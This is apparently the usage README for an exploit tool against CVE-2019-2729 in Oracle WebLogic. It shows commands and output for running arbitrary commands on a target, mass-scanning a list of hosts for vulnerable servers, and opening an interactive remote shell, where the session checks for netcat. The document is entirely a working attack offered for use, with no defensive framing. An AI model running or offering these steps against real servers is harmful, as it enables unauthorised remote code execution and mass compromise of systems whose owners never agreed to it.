PoC for exploiting CVE-2019-2729 on WebLogic
python3 creal.py -h
usage: creal.py [-h] [-u URL] [-f F] [-c CMD] [-s SH]
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL target url
-f F, --file F url file
-c CMD, --command CMD
command
-s SH, --shell SH url to connect
$ python3 creal.py -u http://IP:PORT -c id
____ ____ _____ ____ _
/ _Y __\/ __// _ \/ \
| / | \/|| \ | / \|| |
| \_| /| /_ | |-||| |_/\
\____|_/\_\\____\\_/ \\\____/
</coded by Luchoane>
[++++++] VULNERABLE: http://xxx.xxx.xxx.xxx:xxxx
uid=500(UID) gid=500(GID) groups=500(GROUP)
$ python3 creal.py -f list.txt -c id
____ ____ _____ ____ _
/ _Y __\/ __// _ \/ \
| / | \/|| \ | / \|| |
| \_| /| /_ | |-||| |_/\
\____|_/\_\\____\\_/ \\\____/
</coded by Luchoane>
[++++++] VULNERABLE: http://xxx.xxx.xxx.xxx:xxxx
uid=500(UID) gid=500(GID) groups=500(GROUP)
[-] NOT VULNERABLE: http://xxx.xxx.xxx.xxx:xxxx
[!] There was an error connecting!
--------------------------
Vulnerable targets scanned:
[+] http://xxx.xxx.xxx.xxx:xxxx
$ python3 creal.py -s http://IP:PORT
____ ____ _____ ____ _
/ _Y __\/ __// _ \/ \
| / | \/|| \ | / \|| |
| \_| /| /_ | |-||| |_/\
\____|_/\_\\____\\_/ \\\____/
</coded by Luchoane>
Welcome to the interactive shell for: http://xxx.xxx.xxx.xxx:xxxx
User: USER
> id
uid=500(UID) gid=500(GID) groups=500(GROUP)
> whoami
USER
> which nc
/usr/bin/nc